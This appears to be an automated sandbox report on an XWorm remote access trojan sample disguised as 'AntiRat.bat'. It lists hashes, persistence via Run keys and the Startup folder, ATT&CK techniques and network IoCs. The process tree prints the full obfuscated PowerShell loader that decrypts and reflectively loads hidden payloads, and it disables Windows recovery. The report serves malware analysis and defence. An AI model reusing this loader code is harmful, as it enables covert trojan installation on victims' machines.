xworm | 9478888ccb2e5bc3d4186efff2f45058783d2ef5aa25e351efb2448610388176

Analysis

max time kernel
259s
max time network
261s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
25-01-2025 12:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AntiRat.bat
Size

287KB
MD5

ed4aa7fdb67238c14fa9d266916e6eb3
SHA1

8df2185beef7c7a170bd53921effb4d9ff5d791a
SHA256

9478888ccb2e5bc3d4186efff2f45058783d2ef5aa25e351efb2448610388176
SHA512

97858e4ae2895213c3f140afe48ffd8e0682bdd28f64614896a1009476a2347138b780564fea969881182632c9e715d7af2c4ac1ac397c9d08ed69c7d044e5d7
SSDEEP

6144:afbEDtzm7hg0cIuKH5qGxXl4Vk6YupoHOzNW2TkJaiyIpQP:azE6pLHVx1k7oHqWHyICP

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1524-16-0x0000028071560000-0x0000028071576000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 64 IoCs

flow	pid	Process
16	1524	powershell.exe
19	1524	powershell.exe
20	1524	powershell.exe
26	1524	powershell.exe
27	1524	powershell.exe
30	1524	powershell.exe
31	1524	powershell.exe
32	1524	powershell.exe
34	1524	powershell.exe
35	1524	powershell.exe
36	1524	powershell.exe
37	1524	powershell.exe
38	1524	powershell.exe
39	1524	powershell.exe
40	1524	powershell.exe
41	1524	powershell.exe
42	1524	powershell.exe
43	1524	powershell.exe
49	1524	powershell.exe
52	1524	powershell.exe
56	1524	powershell.exe
57	1524	powershell.exe
58	1524	powershell.exe
59	1524	powershell.exe
60	1524	powershell.exe
61	1524	powershell.exe
62	1524	powershell.exe
63	1524	powershell.exe
64	1524	powershell.exe
65	1524	powershell.exe
66	1524	powershell.exe
67	1524	powershell.exe
68	1524	powershell.exe
69	1524	powershell.exe
70	1524	powershell.exe
71	1524	powershell.exe
72	1524	powershell.exe
73	1524	powershell.exe
74	1524	powershell.exe
75	1524	powershell.exe
76	1524	powershell.exe
80	1524	powershell.exe
81	1524	powershell.exe
83	1524	powershell.exe
84	1524	powershell.exe
85	1524	powershell.exe
86	1524	powershell.exe
87	1524	powershell.exe
88	1524	powershell.exe
89	1524	powershell.exe
90	1524	powershell.exe
91	1524	powershell.exe
92	1524	powershell.exe
93	1524	powershell.exe
94	1524	powershell.exe
95	1524	powershell.exe
96	1524	powershell.exe
97	1524	powershell.exe
98	1524	powershell.exe
99	1524	powershell.exe
100	1524	powershell.exe
101	1524	powershell.exe
102	1524	powershell.exe
103	1524	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1524	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1576956541-1869783662-2981982442-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\ProgramData\\powershell.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1524	powershell.exe
1524	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 1524	2656	cmd.exe	85
PID 2656 wrote to memory of 1524	2656	cmd.exe	85
PID 1524 wrote to memory of 4980	1524	powershell.exe	95
PID 1524 wrote to memory of 4980	1524	powershell.exe	95
PID 4980 wrote to memory of 3808	4980	CMD.EXE	97
PID 4980 wrote to memory of 3808	4980	CMD.EXE	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AntiRat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLHfII79cFXLOPa0He7bvB+XJKUt4rUms5FR0yeN8C8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sOj8a66XAQqml/CBJ6HP3g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FJGpA=New-Object System.IO.MemoryStream(,$param_var); $YjNQm=New-Object System.IO.MemoryStream; $sQOdI=New-Object System.IO.Compression.GZipStream($FJGpA, [IO.Compression.CompressionMode]::Decompress); $sQOdI.CopyTo($YjNQm); $sQOdI.Dispose(); $FJGpA.Dispose(); $YjNQm.Dispose(); $YjNQm.ToArray();}function execute_function($param_var,$param2_var){ $JyGZB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $nnvmF=$JyGZB.EntryPoint; $nnvmF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\AntiRat.bat';$kQiVF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\AntiRat.bat').Split([Environment]::NewLine);foreach ($KHvsD in $kQiVF) { if ($KHvsD.StartsWith(':: ')) { $OGGPu=$KHvsD.Substring(3); break; }}$payloads_var=[string[]]$OGGPu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\SYSTEM32\CMD.EXE
    "CMD.EXE"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4980
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:3808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_neu0jwjq.qca.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1524-14-0x0000028070880000-0x0000028070888000-memory.dmp

Filesize
32KB

Download
memory/1524-1-0x0000028070910000-0x0000028070932000-memory.dmp

Filesize
136KB

Download
memory/1524-11-0x00007FFC468F0000-0x00007FFC473B2000-memory.dmp

Filesize
10.8MB

Download
memory/1524-12-0x00007FFC468F0000-0x00007FFC473B2000-memory.dmp

Filesize
10.8MB

Download
memory/1524-13-0x00007FFC468F0000-0x00007FFC473B2000-memory.dmp

Filesize
10.8MB

Download
memory/1524-0-0x00007FFC468F3000-0x00007FFC468F5000-memory.dmp

Filesize
8KB

Download
memory/1524-15-0x0000028071520000-0x0000028071558000-memory.dmp

Filesize
224KB

Download
memory/1524-16-0x0000028071560000-0x0000028071576000-memory.dmp

Filesize
88KB

Download
memory/1524-23-0x00007FFC468F3000-0x00007FFC468F5000-memory.dmp

Filesize
8KB

Download
memory/1524-24-0x00007FFC468F0000-0x00007FFC473B2000-memory.dmp

Filesize
10.8MB

Download
memory/1524-25-0x00007FFC468F0000-0x00007FFC473B2000-memory.dmp

Filesize
10.8MB

Download
memory/1524-26-0x0000028070870000-0x000002807087A000-memory.dmp

Filesize
40KB

Download